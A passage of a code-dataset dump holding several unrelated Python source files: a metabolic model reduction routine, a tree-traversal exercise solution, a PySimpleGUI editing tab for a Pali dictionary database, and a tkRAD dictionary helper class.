print 'removing {}\\t balance {}\\t turnover {}'.format(m_id, balance, turnover)\n\n assert abs(balance) < abstol\n\n if abs(turnover) > abstol:\n\n new_neighbours = _reaction_neighbours(model, neighbours)\n new_coeffs = dict()\n\n for m_id2 in new_neighbours:\n coeff = sum([model.stoichiometry[(m_id2, r_id)] * fluxes[r_id] for r_id in neighbours if\n (m_id2, r_id) in model.stoichiometry]) / turnover\n flow = sum([abs(model.stoichiometry[(m_id2, r_id)]) * fluxes[r_id] for r_id in neighbours if\n (m_id2, r_id) in model.stoichiometry]) / 2\n if abs(coeff) > abstol:\n new_coeffs[m_id2] = coeff\n else:\n if must_keep and m_id2 in must_keep and flow > abstol:\n # print 'removing {} violated {} turnover {} coeff {} flow {}'.format(m_id, m_id2, turnover, coeff, flow)\n return\n\n if new_coeffs:\n new_id = 'R_' + str(uuid4())[:8]\n reversible = all([model.reactions[r_id].reversible for r_id in neighbours])\n model.add_reaction(Reaction(new_id, new_id, reversible))\n\n if not reversible and isinstance(model, CBModel):\n model.set_lower_bound(new_id, 0)\n\n for m_id2, coeff in new_coeffs.items():\n model.stoichiometry[(m_id2, new_id)] = coeff\n\n fluxes[new_id] = turnover\n\n model.remove_reactions(neighbours)\n else:\n model.remove_reactions([r_id for r_id in neighbours if abs(fluxes[r_id]) < abstol])\n\n model.remove_metabolite(m_id)\n\n\ndef _metabolite_neighbours(model, metabolites):\n return _get_neighbours(model, metabolites, 'metabolites')\n\n\ndef _reaction_neighbours(model, reactions):\n return _get_neighbours(model, reactions, 'reactions')\n\n\ndef _get_neighbours(model, elements, kind):\n if kind == 'metabolites':\n table = model.metabolite_reaction_lookup()\n elif kind == 'reactions':\n table = model.reaction_metabolite_lookup_table()\n neighbours = []\n for elem in elements:\n for neighbour in table[elem].keys():\n if neighbour not in neighbours:\n neighbours.append(neighbour)\n return neighbours\n\n\ndef _verify_balance(model, metabolites, fluxes, abstol=1e-9):\n m_r_table = model.metabolite_reaction_lookup()\n\n success = True\n\n for m_id in metabolites:\n neighbours = m_r_table[m_id]\n balance = sum([coeff * fluxes[r_id] for r_id, coeff in neighbours.items()])\n if abs(balance) > 
abstol:\n success = False\n warnings.warn('{} balance {}'.format(m_id, balance), UserWarning)\n return success\n\n\ndef _disconnected_metabolites(model):\n m_r_table = model.metabolite_reaction_lookup()\n return [m_id for m_id, edges in m_r_table.items() if not edges]\n\n\ndef _disconnected_reactions(model):\n return [r_id for r_id, rxn in model.reactions.items() if len(rxn.stoichiometry) == 0]\n","repo_name":"cdanielmachado/framed","sub_path":"src/framed/experimental/reduction.py","file_name":"reduction.py","file_ext":"py","file_size_in_byte":4462,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"83"} +{"seq_id":"2820095898","text":"def middle(n):\n global result\n if n:\n middle(ch1[n])\n result += arr[n]\n middle(ch2[n])\n\n\nfor test_case in range(1,11):\n N = int(input())\n arr = [''] * (N+1)\n result = ''\n root_idx = 1\n ch1 = [0] * (N+1)\n ch2 = [0] * (N+1)\n par = [0] * (N+1)\n for _ in range(N):\n word = input().split()\n p = int(word[0])\n arr[p] = word[1]\n if len(word) > 2:\n c1 = int(word[2])\n ch1[p] = c1\n par[c1] = p\n if len(word) > 3:\n c2 = int(word[3])\n ch2[p] = c2\n par[c2] = p\n middle(root_idx)\n print(f'#{test_case} {result}')","repo_name":"kimjinho-dev/baekjoon","sub_path":"SWEA/D4/1231. [S/W 문제해결 기본] 9일차 - 중위순회/[S/W 문제해결 기본] 9일차 - 중위순회.py","file_name":"[S/W 문제해결 기본] 9일차 - 중위순회.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"21785566993","text":"\"\"\"Render tab to edit PaliWord table in the database.\"\"\"\n\nfrom completion_combo import CompletionCombo\nfrom functions_db import get_verb_values\nfrom functions_db import get_case_values\nfrom functions_db import get_root_key_values\nfrom functions_db import get_family_word_values\nfrom functions_db import get_family_set_values\nfrom functions_db import get_compound_type_values\nfrom functions_db import get_patterns\nfrom tools.pos import POS\n\nVERB_VALUES = get_verb_values()\nTRANS_VALUES = [\"\", \"trans\", \"intrans\", \"ditrans\"]\nNEG_VALUES = [\"\", \"neg\", \"neg x2\"]\nCASE_VALUES = get_case_values()\nROOT_VALUES = get_root_key_values()\nFAMILY_WORD_VALUES = get_family_word_values()\nFAMILY_SET_VALUES = get_family_set_values()\nDERIVATIVE_VALUES = [\"\", \"kicca\", \"kita\", \"taddhita\"]\nCOMPOUND_TYPE_VALUES = get_compound_type_values()\nPATTERN_VALUES = get_patterns()\n\n\ndef make_tab_edit_dpd(sg, primary_user):\n\n origin = \"pass1\" if primary_user else \"dps\"\n\n add_word_layout = [\n [\n sg.Text(\"show fields\", size=(15, 1)),\n sg.Radio(\n \"all\", \"group1\",\n key=\"show_fields_all\",\n enable_events=True,\n tooltip=\"Show the fields relevant to the type of word\"),\n sg.Radio(\n \"root\", \"group1\",\n key=\"show_fields_root\",\n enable_events=True,\n tooltip=\"Show the fields relevant to the type of word\"),\n sg.Radio(\n \"compound\", \"group1\",\n key=\"show_fields_compound\",\n enable_events=True,\n tooltip=\"Show the fields relevant to the type of word\"),\n sg.Radio(\n \"word\", \"group1\",\n key=\"show_fields_word\",\n enable_events=True,\n tooltip=\"Show the fields relevant to the type of word\"),\n sg.Text(\n \"\", key=\"show_fields_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"id\", size=(15, 1, )),\n sg.Input(\n \"\", key=\"id\", size=(20, 1),\n background_color=\"black\",\n tooltip=\"A unique id.\\n\"),\n\n sg.Text(\"user_id\"),\n sg.Input(\n \"\", key=\"user_id\", size=(21, 1),\n background_color=\"black\",\n 
tooltip=\"A unique user id.\"),\n sg.Text(\n \"\", key=\"id_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"pali_1\", size=(15, 1)),\n sg.Input(\n key=\"pali_1\", size=(50, 1),\n tooltip=\"Vocative singular of nouns and partitiplces,\\n\\\n3rd person singular of verbs, unless irrgular.\"),\n sg.Text(\n \"\", key=\"pali_1_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"pali_2*\", size=(15, 1)),\n sg.Input(\n key=\"pali_2\", size=(50, 1), enable_events=True,\n tooltip=\"Nominative singular of masc and neuter nouns.\"),\n sg.Text(\n \"\", key=\"pali_2_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"pos\", size=(15, 1)),\n CompletionCombo(\n POS, key=\"pos\", size=(7, 1), enable_events=True,\n text_color=None, background_color=None,\n tooltip=\"Part of speech. Only use values in the dropdown list.\"\n ),\n sg.Text(\n \"\", key=\"pos_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"grammar*\", size=(15, 1)),\n sg.Input(\n key=\"grammar\", size=(50, 1), enable_events=True,\n tooltip=\"Order:\\npos\\n, or of\\n\"),\n sg.Text(\n \"\", key=\"grammar_error\", size=(50, 1), text_color=\"red\")\n ],\n\n [\n sg.Text(\"derived_from*\", size=(15, 1)),\n sg.Input(\n key=\"derived_from\", size=(50, 1),\n enable_events=True,\n tooltip=\"Kitas are derived from the present tense verb.\\n\\\nTaddhitas - remove prefix and suffixes.\"),\n sg.Text(\n \"\", key=\"derived_from_error\", size=(50, 1), text_color=\"red\")\n\n ],\n [\n sg.Text(\"neg\", size=(15, 1)),\n CompletionCombo(\n NEG_VALUES, key=\"neg\", size=(7, 1),\n tooltip=\"Negatives. Mostly prefixed with na, nir or vi.\"),\n sg.Text(\"\", key=\"neg_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"verb\", size=(15, 1)),\n sg.pin(\n CompletionCombo(\n VERB_VALUES, key=\"verb\", size=(13, 1),\n tooltip=\"Type of verb. 
Synchronize with base and grammar.\")),\n sg.Text(\"\", key=\"verb_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"trans\", size=(15, 1)),\n sg.pin(\n CompletionCombo(\n TRANS_VALUES, key=\"trans\", size=(7, 1),\n tooltip=\"Transitivity of verbs and active participles.\\n\\\nLeave blank for other parts of speech.\")),\n sg.Text(\n \"\", key=\"trans_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"case\", size=(15, 1)),\n CompletionCombo(\n CASE_VALUES, key=\"plus_case\", size=(20, 1),\n tooltip=\"What case does a related syntactically related word take?\"),\n sg.Text(\n \"\", key=\"case_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"meaning_1\", size=(15, 2)),\n sg.Multiline(\n key=\"meaning_1\", size=(50, 2), no_scrollbar=True,\n enable_events=True,\n tooltip=\"Primary meanings, seperated by ';'\"),\n sg.Text(\n \"\", key=\"meaning_1_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"add_spelling\", size=(15, 1)),\n sg.Input(\n key=\"add_spelling\", size=(25, 1), enable_events=True,\n tooltip=\"Add a word to the user dictionary.\"),\n sg.Button(\"Add\", key=\"add_spelling_button\", font=(None, 13)),\n sg.Button(\"Edit\", key=\"edit_spelling_button\", font=(None, 13)),\n sg.Button(\"Check\", key=\"check_spelling_button\", font=(None, 13)),\n sg.Text(\n \"\", key=\"add_spelling_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"meaning_lit\", size=(15, 1)),\n sg.Input(\n key=\"meaning_lit\", size=(50, 1),\n enable_events=True,\n tooltip=\"Literal meaning of the prefix and suffix.\\n\\\nLeave empty for long compounds.\"),\n sg.Text(\n \"\", key=\"meaning_lit_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"meaning_2\", size=(15, 1)),\n sg.pin(\n sg.Input(\n key=\"meaning_2\", size=(50, 1),\n enable_events=True,\n tooltip=\"Meaning from Buddhadatta or CPED or DPS.\"),\n ),\n sg.Text(\n \"\", key=\"meaning_2_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"suggestion\", visible=not primary_user, size=(15, 1)),\n sg.Button(\"GPT\", visible=not primary_user, key=\"online_suggestion_button\"),\n sg.Multiline(\n key=\"online_suggestion\",\n visible=not primary_user,\n size=(45, 2),\n enable_events=True,\n ),\n sg.Text(\n \"\", key=\"online_suggestion_error\", size=(50, 1), text_color=\"red\", visible=not primary_user)\n ],\n [\n sg.Text(\"root_key\", size=(15, 1)),\n sg.pin(\n CompletionCombo(\n ROOT_VALUES, key=\"root_key\",\n size=(10, 1),\n auto_size_text=False,\n tooltip=\"Root key in PaliRoots table.\\n\\\nSelect a value from the dropdown list.\")),\n sg.Text(\n \"\", key=\"root_info\", text_color=\"white\",\n pad=(10, 0)),\n sg.Text(\n \"\", key=\"root_key_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"family_root*\", size=(15, 1)),\n sg.pin(\n sg.Combo(\n values=[], key=\"family_root\",\n size=(40, 1),\n enable_events=True,\n enable_per_char_events=True,\n auto_size_text=False,\n tooltip=\"Prefix(es) and root seperated by a space.\")),\n sg.pin(\n sg.Button(\n \"Get\",\n size=(5, 1),\n font=(None, 13),\n key=\"get_family_root\")),\n sg.Text(\n \"\", key=\"family_root_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"root_sign*\", size=(15, 1)),\n sg.pin(\n sg.Combo(\n values=[],\n key=\"root_sign\",\n size=(40, 1),\n enable_events=True,\n enable_per_char_events=True,\n auto_size_text=False,\n tooltip=\"Sign of the verb.\\n\\\nInlclude '*' for causatives and group 8 verbs.\")),\n sg.pin(\n sg.Button(\n \"Get\",\n size=(5, 1),\n font=(None, 13),\n 
key=\"get_root_sign\")),\n sg.Text(\n \"\", key=\"root_sign_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"root_base\", size=(15, 1)),\n sg.pin(\n sg.Combo(\n values=[],\n key=\"root_base\",\n size=(40, 1),\n enable_per_char_events=True,\n auto_size_text=False,\n tooltip=\"Root + sign = Base. (caus, pass, etc.)\\n\\\nIf irregular, show phonetic development, e.g.\\n\\\nkar + *āpe > kārāpe > karāpe (caus, irreg).\")),\n sg.pin(\n sg.Button(\n \"Get\",\n size=(5, 1),\n font=(None, 13),\n key=\"get_root_base\")),\n sg.Text(\n \"\", key=\"root_base_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"family_word\", size=(15, 1)),\n sg.pin(\n CompletionCombo(\n FAMILY_WORD_VALUES,\n key=\"family_word\",\n size=(49, 1),\n tooltip=\"Family of the word if not derived from a root.\"),\n ),\n sg.Text(\n \"\", key=\"family_word_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"family_compound*\", size=(15, 1)),\n sg.pin(\n sg.Input(\n key=\"family_compound\", size=(50, 1),\n enable_events=True,\n tooltip=\"Family compounds, seperated by space.\")),\n sg.Text(\n \"\", key=\"family_compound_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"construction*\", size=(15, 2)),\n sg.Multiline(\n key=\"construction\",\n no_scrollbar=True,\n size=(50, 2),\n enable_events=True,\n tooltip=\"Construciton of the word, showing all phonetic change.\"),\n sg.Text(\n \"\", key=\"construction_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"\", size=(15, 1)),\n sg.pin(\n sg.Input(\n key=\"add_construction\", size=(20, 1),\n tooltip=\"Add this word to the words to add list.\")),\n sg.pin(\n sg.Button(\n \"Add\", key=\"add_construction_button\", font=(None, 13))),\n sg.Text(\n \"\", key=\"add_construction_error\", size=(50, 1),\n text_color=\"red\")\n ],\n [\n sg.Text(\"derivative\", size=(15, 1)),\n sg.pin(\n CompletionCombo(\n values=DERIVATIVE_VALUES, key=\"derivative\", size=(10, 1),\n enable_per_char_events=True,\n tooltip=\"Choose a value from the dropdown\")),\n sg.Text(\n \"\", key=\"derivative_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"suffix*\", size=(15, 1)),\n sg.pin(\n sg.Input(\n key=\"suffix\",\n enable_events=True,\n size=(31, 1),\n tooltip=\"Final suffix used. 
Don't add for words with case endings\")),\n sg.Text(\n \"\", key=\"suffix_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"phonetic\", size=(15, 1)),\n sg.Multiline(\n key=\"phonetic\", size=(50, 2), no_scrollbar=True,\n tooltip=\"List of all phonetic changes\"),\n sg.Text(\n \"\", key=\"phonetic_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"compound_type\", size=(15, 1)),\n sg.pin(\n CompletionCombo(\n COMPOUND_TYPE_VALUES,\n key=\"compound_type\", size=(49, 1),\n tooltip=\"Type of samāsa\")),\n sg.Text(\n \"\", key=\"compound_type_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"compound_construction*\", size=(15, 1)),\n sg.pin(\n sg.Input(\n key=\"compound_construction\", size=(50, 1),\n enable_events=True,\n tooltip=\"Construction of the samāsa, showing case relationship\")),\n sg.Text(\n \"\", key=\"compound_construction_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"\", size=(15, 1)),\n sg.Input(\n key=\"bold_cc\", size=(20, 1),\n tooltip=\"Add bold to the case ending\"),\n sg.Button(\"Bold\", key=\"bold_cc_button\", font=(None, 13)),\n ],\n [\n sg.Text(\"non_root_in_comps\", size=(15, 1)),\n sg.pin(\n sg.Input(\n key=\"non_root_in_comps\", size=(50, 1),\n tooltip=\"\")),\n sg.Text(\n \"\", key=\"non_root_in_comps_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"antonym\", size=(15, 1)),\n sg.Input(\n key=\"antonym\", size=(50, 1),\n tooltip=\"Word(s) with the opposite meaning\"),\n sg.Text(\n \"\", key=\"antonym_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"synonym*\", size=(15, 1)),\n sg.Input(\n key=\"synonym\", size=(50, 1), enable_events=True,\n tooltip=\"Will get automatically filled\"),\n sg.Text(\n \"\", key=\"synonym_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"variant\", size=(15, 1)),\n sg.Input(\n key=\"variant\", size=(50, 1), enable_events=True,\n tooltip=\"Add variant readings in text\"),\n sg.Text(\n \"\", key=\"variant_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"commentary\", size=(15, 5)),\n sg.Multiline(\n key=\"commentary\", size=(50, 5), no_scrollbar=True,\n tooltip=\"Add commentary definition\"),\n sg.Text(\n \"\", key=\"commentary_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"search for\", size=(15, 1)),\n sg.Input(\n \"\", key=\"search_for\", size=(20, 1),\n enable_events=True,\n tooltip=\"Search for BOLD words in commentaries\"),\n sg.Input(\n \"\", key=\"contains\", size=(17, 1),\n tooltip=\"Search for NOT BOLD words in commentaries\"),\n sg.Button(\n \"Search\", key=\"defintions_search_button\", font=(None, 13)),\n sg.Button(\n \"Clean\", key=\"commentary_clean\", font=(None, 13)),\n sg.Text(\n \"\", key=\"search_for_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"notes\", size=(15, 1)),\n sg.Input(\n key=\"notes\", size=(50, 41), tooltip=\"Add additional notes\"),\n sg.Text(\n \"\", key=\"notes_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"non_ia\", size=(15, 1)),\n sg.pin(\n sg.Input(\n key=\"non_ia\", size=(50, 41),\n tooltip=\"Cognate of the word in non Indo-Aryan languages?\"),\n ),\n sg.Text(\n \"\", key=\"non_ia_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"sanskrit*\", size=(15, 1)),\n sg.Input(\n key=\"sanskrit\", size=(50, 1), enable_events=True,\n tooltip=\"Cogante of the word in Sanskrit or BHS.\"),\n sg.Text(\n \"\", key=\"sanskrit_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"cognate\", size=(15, 1)),\n 
sg.Input(\n key=\"cognate\", size=(50, 1),\n tooltip=\"Cognate words in English\"),\n sg.Text(\n \"\", key=\"cognate_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"link\", size=(15, 1)),\n sg.Input(\n key=\"link\", size=(50, 1),\n tooltip=\"Add a wikipedia link\"),\n sg.Text(\n \"\", key=\"link_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"source_1*\", size=(15, 1)),\n sg.Input(\n key=\"source_1\", size=(50, 1), enable_events=True,\n tooltip=\"Sutta code using DPR system\"),\n sg.Text(\n \"\", key=\"source_1_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"sutta_1*\", size=(15, 1)),\n sg.Input(\n key=\"sutta_1\", size=(50, 1), enable_events=True,\n tooltip=\"Sutta name\"),\n sg.Text(\n \"\", key=\"sutta_1_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"example_1*\", size=(15, 5)),\n sg.Multiline(\n key=\"example_1\", size=(49, 5),\n enable_events=True,\n tooltip=\"Sutta example. Add all sandhi apostrophes.\"),\n sg.Text(\n \"\", key=\"example_1_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"\", size=(15, 1)),\n sg.Input(\n key=\"bold_1\", size=(20, 1),\n tooltip=\"Bold the word\"),\n sg.Button(\"Bold\", key=\"bold_1_button\", font=(None, 13)),\n sg.Button(\n \"Another Eg\",\n key=\"another_eg_1\",\n tooltip=\"Find another sutta example\",\n font=(None, 13)),\n sg.Button(\"Lower\", key=\"example_1_lower\", font=(None, 13)),\n sg.Button(\"Clean\", key=\"example_1_clean\", font=(None, 13)),\n sg.Text(\"\", key=\"bold_1_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"source_2\", size=(15, 1)),\n sg.pin(\n sg.Input(\n key=\"source_2\", size=(50, 1),\n tooltip=\"Sutta code using DPR system\")),\n sg.Text(\n \"\", key=\"source_2_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"sutta_2\", size=(15, 1)),\n sg.pin(\n sg.Input(\n key=\"sutta_2\", size=(50, 1),\n tooltip=\"Sutta name\")),\n sg.Text(\n \"\", key=\"sutta_2_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"example_2\", size=(15, 5)),\n sg.pin(\n sg.Multiline(\n key=\"example_2\", size=(49, 5),\n tooltip=\"Sutta example. 
Add all sandhi apostrophes.\")),\n sg.Text(\n \"\", key=\"example_2_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"\", size=(15, 1)),\n sg.pin(\n sg.Input(\n key=\"bold_2\", size=(20, 1),\n tooltip=\"Bold the word\")),\n sg.pin(\n sg.Button(\"Bold\", key=\"bold_2_button\", font=(None, 13))),\n sg.pin(\n sg.Button(\n \"Another Eg\", key=\"another_eg_2\", font=(None, 13),\n tooltip=\"Find another sutta example\")),\n sg.pin(\n sg.Button(\"Lower\", key=\"example_2_lower\", font=(None, 13))),\n sg.pin(\n sg.Button(\"Clean\", key=\"example_2_clean\", font=(None, 13))),\n sg.Text(\"\", key=\"bold_2_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"family set*\", size=(15, 1)),\n CompletionCombo(\n FAMILY_SET_VALUES, key=\"family_set\",\n size=(49, 1),\n tooltip=\"Add to sets\"),\n sg.Text(\"\", key=\"family_set_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"stem pattern*\", size=(15, 1)),\n sg.Input(\n key=\"stem\", size=(30, 1), justification=\"r\",\n enable_events=True,\n tooltip=\"Stem of the word, without the pattern\"),\n CompletionCombo(\n PATTERN_VALUES, key=\"pattern\",\n size=(12, 1), tooltip=\"Inflection pattern of the word\"),\n sg.Input(\n origin, key=\"origin\", size=(6, 1),\n tooltip=\"Where does this word data come from?\"),\n sg.Text(\n \"\", key=\"stem_error\", size=(50, 1), text_color=\"red\"),\n sg.Text(\n \"\", key=\"pattern_error\", size=(50, 1), text_color=\"red\")\n ],\n ]\n\n tab_edit_dpd = [\n [\n sg.Column(\n add_word_layout,\n scrollable=True,\n vertical_scroll_only=True,\n expand_y=True,\n expand_x=True,\n size=(None, 850),\n ),\n ],\n [\n sg.HSep(),\n ],\n [\n # db buttons\n sg.Text(\"db buttons\", size=(15, 1)),\n sg.Button(\n \"Clone\", tooltip=\"Clone a word from the db\"),\n sg.Input(\n key=\"word_to_clone_edit\",\n size=(15, 1),\n enable_events=True,\n tooltip=\"Enter id or pali_1\"\n ),\n sg.Button(\n \"Edit\", key=\"edit_button\", tooltip=\"Edit a word in the db\"),\n sg.Button(\n \"Test\", key=\"test_internal_button\",\n tooltip=\"Run internal tests\"),\n sg.Button(\n \"Update db\", key=\"update_db_button1\",\n tooltip=\"Add a new word or update existing word in the db\",\n visible=primary_user),\n sg.Button(\n \"Update DB\", key=\"update_db_button2\",\n tooltip=\"Add a new word or update existing word in the db\",\n visible=not primary_user),\n sg.Button(\n \"Delete\", key=\"delete_button\",\n tooltip=\"Delete a word from the db. 
Careful!\",\n mouseover_colors=\"red\",\n visible=primary_user),\n sg.Button(\n \"Update Sandhi\", key=\"update_sandhi_button\",\n tooltip=\"Update list of words with sandhi apostophes\"),\n sg.Button(\n \"Log\", key=\"open_corrections_button\",\n tooltip=\"open corrections tsv in code\",\n visible=not primary_user),\n ],\n [\n # gui buttons\n sg.Text(\"gui buttons\", size=(15, 1)),\n sg.Button(\n \"Open Tests\", key=\"open_tests_button\",\n tooltip=\"Open TSV file of internal tests\"),\n sg.Button(\n \"Debug\", key=\"debug_button\",\n tooltip=\"Print the current values in the terminal\"),\n sg.Button(\n \"Stash\", key=\"stash_button\",\n tooltip=\"Stash the word to edit it again later\"),\n sg.Button(\n \"Unstash\", key=\"unstash_button\",\n tooltip=\"Unstash a word to edit it again\"),\n sg.Button(\n \"Summary\", key=\"summary_button\",\n tooltip=\"See a summary of filled fields\"),\n sg.Button(\n \"Save\", key=\"save_state_button\",\n tooltip=\"Save the current state of the GUI\"),\n sg.Button(\n \"Clear\", key=\"clear_button\", tooltip=\"Clear all the fields\"),\n sg.Button(\n \"Save and Close\", key=\"save_and_close_button\",\n tooltip=\"Save the current state, backup to tsv and close\"),\n ]\n ]\n\n return tab_edit_dpd\n","repo_name":"digitalpalidictionary/dpd-db","sub_path":"gui/tab_edit_dpd.py","file_name":"tab_edit_dpd.py","file_ext":"py","file_size_in_byte":25681,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"83"} +{"seq_id":"8140671108","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n tkRAD - tkinter Rapid Application Development library\n\n (c) 2013+ Raphaël SEBAN \n\n This program is free software: you can redistribute it and/or\n modify it under the terms of the GNU General Public License as\n published by the Free Software Foundation, either version 3 of\n the License, or (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n General Public License for more details.\n\n You should have received a copy of the GNU General Public\n License along with this program.\n\n If not, see: http://www.gnu.org/licenses/\n\"\"\"\n\n\n\n# ========================= STANDALONE MODULE ==========================\n\n\n\nclass StructDict (dict):\n r\"\"\"\n generic 'class structure' dictionary;\n\n supports item value get / set overrides;\n\n items should be of same 'class structure' type;\n \"\"\"\n\n\n\n def __getitem__ (self, key):\n r\"\"\"\n item value getter;\n\n overrides to item.getter() if @key exists and is\n\n of item type;\n\n behaves as dict() otherwise i.e. 
returns dict[@key];\n \"\"\"\n\n _item = super().__getitem__(key)\n\n if isinstance(_item, self.item_type):\n\n return getattr(_item, self.item_value_getter)()\n\n else:\n\n return _item\n\n # end if\n\n # end def\n\n\n\n def __init__ (self, *args, **kw):\n r\"\"\"\n class constructor;\n\n implements @item_type class member:\n\n dict item 'class type' for item value override support;\n\n implements @item_value_getter class member:\n\n name of item class method for getting internal value;\n\n default name value is \"get_value\";\n\n implements @item_value_setter class member:\n\n name of item class method for setting internal value;\n\n default name value is \"set_value\";\n \"\"\"\n\n # super class inits\n\n super().__init__(*args, **kw)\n\n # member inits\n\n self.item_type = None\n\n self.item_value_getter = \"get_value\"\n\n self.item_value_setter = \"set_value\"\n\n # end def\n\n\n\n def __setitem__ (self, key, value):\n r\"\"\"\n item value setter;\n\n overrides to item.setter(@value) if @key exists and is\n\n of 'item type' type;\n\n behaves as dict() otherwise i.e. dict[@key] = @value;\n \"\"\"\n\n _item = super().get(key)\n\n if isinstance(_item, self.item_type):\n\n getattr(_item, self.item_value_setter)(value)\n\n else:\n\n super().__setitem__(key, value)\n\n # end if\n\n # end def\n\n\n\n def flatten (self):\n r\"\"\"\n returns a new dict() of item.value instead of item itself;\n\n this provides a \"flat\" dict of (key, value) pairs;\n\n keeps current items() UNTOUCHED;\n \"\"\"\n\n # inits\n\n _dict = dict()\n\n # loop on items\n\n for _key in self.keys():\n\n # flattens item to its value\n\n _dict[_key] = self.get(_key)\n\n # end for\n\n # return new dict() object\n\n return _dict\n\n # end def\n\n\n\n def get (self, key, default = None):\n r\"\"\"\n item value getter;\n\n overrides to item.getter() if @key exists and\n\n is of 'item type' type;\n\n behaves as dict() otherwise i.e. 
dict.get(@key, @default);\n \"\"\"\n\n _item = super().get(key, default)\n\n if isinstance(_item, self.item_type):\n\n return getattr(_item, self.item_value_getter)()\n\n else:\n\n return _item\n\n # end if\n\n # end def\n\n\n\n def get_item (self, key, default = None):\n r\"\"\"\n returns dict item along @key no matter what it is like;\n\n returns @default if @key does not exist in dict;\n\n same as dict.get(@key, @default);\n \"\"\"\n\n return super().get(key, default)\n\n # end def\n\n\n\n def get_value (self, key, default = None):\n r\"\"\"\n alias method name for .get(...);\n\n defined only for commodity and for code readability;\n \"\"\"\n\n return self.get(key, default)\n\n # end def\n\n\n\n @property\n def item_value_getter (self):\n r\"\"\"\n @property handler for 'item value getter' class member;\n\n 'item value getter' MUST be of plain string type;\n\n raises TypeError otherwise;\n \"\"\"\n\n return self.__item_value_getter\n\n # end def\n\n\n\n @item_value_getter.setter\n def item_value_getter (self, getter):\n\n if getter and isinstance(getter, str):\n\n self.__item_value_getter = getter\n\n else:\n\n raise TypeError(\n\n \"item value getter must be of PLAIN char string type.\"\n )\n\n # end if\n\n # end def\n\n\n\n @item_value_getter.deleter\n def item_value_getter (self):\n\n del self.__item_value_getter\n\n # end def\n\n\n\n @property\n def item_value_setter (self):\n r\"\"\"\n @property handler for 'item value setter' class member;\n\n 'item value setter' MUST be of plain string type;\n\n raises TypeError otherwise;\n \"\"\"\n\n return self.__item_value_setter\n\n # end def\n\n\n\n @item_value_setter.setter\n def item_value_setter (self, setter):\n\n if setter and isinstance(setter, str):\n\n self.__item_value_setter = setter\n\n else:\n\n raise TypeError(\n\n \"item value setter must be of PLAIN char string type.\"\n )\n\n # end if\n\n # end def\n\n\n\n @item_value_setter.deleter\n def item_value_setter (self):\n\n del self.__item_value_setter\n\n # end def\n\n\n\n def set (self, key, value):\n r\"\"\"\n 'item value' setter;\n\n overrides to item.setter(@value) if @key exists and is\n\n of 'item type' type;\n\n behaves as dict() otherwise i.e. 
